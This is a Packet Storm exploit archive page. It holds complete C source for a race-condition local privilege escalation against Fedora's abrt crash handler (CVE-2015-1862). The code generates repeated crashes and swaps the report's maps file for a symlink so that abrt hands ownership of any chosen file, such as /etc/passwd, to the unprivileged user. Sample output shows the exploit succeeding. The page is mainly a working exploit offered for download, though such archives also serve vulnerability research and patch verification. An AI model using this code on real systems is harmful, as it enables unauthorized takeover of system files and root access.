Exploit the possiblities

Fedora abrt Race Condition

Fedora abrt Race Condition
Posted Apr 15, 2015
Authored by Tavis Ormandy

Fedora abrt race condition exploit. It should be noted that it can take a few minutes to win the race condition.

tags | exploit
systems | linux, fedora
advisories | CVE-2015-1862
MD5 | ddc819cc96b3d3b943f4731b28cabe60

Fedora abrt Race Condition

Change Mirror Download
#include <stdlib.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdio.h>
#include <signal.h>
#include <err.h>
#include <string.h>
#include <alloca.h>
#include <limits.h>
#include <sys/inotify.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>

//
// This is a race condition exploit for CVE-2015-1862, targeting Fedora.
//
// Note: It can take a few minutes to win the race condition.
//
// -- taviso@cmpxchg8b.com, April 2015.
//
// $ cat /etc/fedora-release
// Fedora release 21 (Twenty One)
// $ ./a.out /etc/passwd
// [ wait a few minutes ]
// Detected ccpp-2015-04-13-21:54:43-14183.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14186.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14191.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14195.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14198.new, attempting to race...
// Exploit successful...
// -rw-r--r--. 1 taviso abrt 1751 Sep 26 2014 /etc/passwd
//

static const char kAbrtPrefix[] = "/var/tmp/abrt/";
static const size_t kMaxEventBuf = 8192;
static const size_t kUnlinkAttempts = 8192 * 2;
static const int kCrashDelay = 10000;

static pid_t create_abrt_events(const char *name);

int main(int argc, char **argv)
{
int fd, i;
int watch;
pid_t child;
struct stat statbuf;
struct inotify_event *ev;
char *eventbuf = alloca(kMaxEventBuf);
ssize_t size;

// First argument is the filename user wants us to chown().
if (argc != 2) {
errx(EXIT_FAILURE, "please specify filename to chown (e.g. /etc/passwd)");
}

// This is required as we need to make different comm names to avoid
// triggering abrt rate limiting, so we fork()/execve() different names.
if (strcmp(argv[1], "crash") == 0) {
__builtin_trap();
}

// Setup inotify, and add a watch on the abrt directory.
if ((fd = inotify_init()) < 0) {
err(EXIT_FAILURE, "unable to initialize inotify");
}

if ((watch = inotify_add_watch(fd, kAbrtPrefix, IN_CREATE)) < 0) {
err(EXIT_FAILURE, "failed to create new watch descriptor");
}

// Start causing crashes so that abrt generates reports.
if ((child = create_abrt_events(*argv)) == -1) {
err(EXIT_FAILURE, "failed to generate abrt reports");
}

// Now start processing inotify events.
while ((size = read(fd, eventbuf, kMaxEventBuf)) > 0) {

// We can receive multiple events per read, so check each one.
for (ev = eventbuf; ev < eventbuf + size; ev = &ev->name[ev->len]) {
char dirname[NAME_MAX];
char mapsname[NAME_MAX];
char command[1024];

// If this is a new ccpp report, we can start trying to race it.
if (strncmp(ev->name, "ccpp", 4) != 0) {
continue;
}

// Construct pathnames.
strncpy(dirname, kAbrtPrefix, sizeof dirname);
strncat(dirname, ev->name, sizeof dirname);

strncpy(mapsname, dirname, sizeof dirname);
strncat(mapsname, "/maps", sizeof mapsname);

fprintf(stderr, "Detected %s, attempting to race...\n", ev->name);

// Check if we need to wait for the next event or not.
while (access(dirname, F_OK) == 0) {
for (i = 0; i < kUnlinkAttempts; i++) {
// We need to unlink() and symlink() the file to win.
if (unlink(mapsname) != 0) {
continue;
}

// We won the first race, now attempt to win the
// second race....
if (symlink(argv[1], mapsname) != 0) {
break;
}

// This looks good, but doesn't mean we won, it's possible
// chown() might have happened while the file was unlinked.
//
// Give it a few microseconds to run chown()...just in case
// we did win.
usleep(10);

if (stat(argv[1], &statbuf) != 0) {
errx(EXIT_FAILURE, "unable to stat target file %s", argv[1]);
}

if (statbuf.st_uid != getuid()) {
break;
}

fprintf(stderr, "\tExploit successful...\n");

// We're the new owner, run ls -l to show user.
sprintf(command, "ls -l %s", argv[1]);
system(command);

return EXIT_SUCCESS;
}
}

fprintf(stderr, "\tDidn't win, trying again!\n");
}
}

err(EXIT_FAILURE, "failed to read inotify event");
}

// This routine attempts to generate new abrt events. We can't just crash,
// because abrt sanely tries to rate limit report creation, so we need a new
// comm name for each crash.
static pid_t create_abrt_events(const char *name)
{
char *newname;
int status;
pid_t child, pid;

// Create a child process to generate events.
if ((child = fork()) != 0)
return child;

// Make sure we stop when parent dies.
prctl(PR_SET_PDEATHSIG, SIGKILL);

while (true) {
// Choose a new unused filename
newname = tmpnam(0);

// Make sure we're not too fast.
usleep(kCrashDelay);

// Create a new crashing subprocess.
if ((pid = fork()) == 0) {
if (link(name, newname) != 0) {
err(EXIT_FAILURE, "failed to create a new exename");
}

// Execute crashing process.
execl(newname, newname, "crash", NULL);

// This should always work.
err(EXIT_FAILURE, "unexpected execve failure");
}

// Reap crashed subprocess.
if (waitpid(pid, &status, 0) != pid) {
err(EXIT_FAILURE, "waitpid failure");
}

// Clean up the temporary name.
if (unlink(newname) != 0) {
err(EXIT_FAILURE, "failed to clean up");
}

// Make sure it crashed as expected.
if (!WIFSIGNALED(status)) {
errx(EXIT_FAILURE, "something went wrong");
}
}

return child;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    1 Files
  • 22
    Jan 22nd
    15 Files
  • 23
    Jan 23rd
    12 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close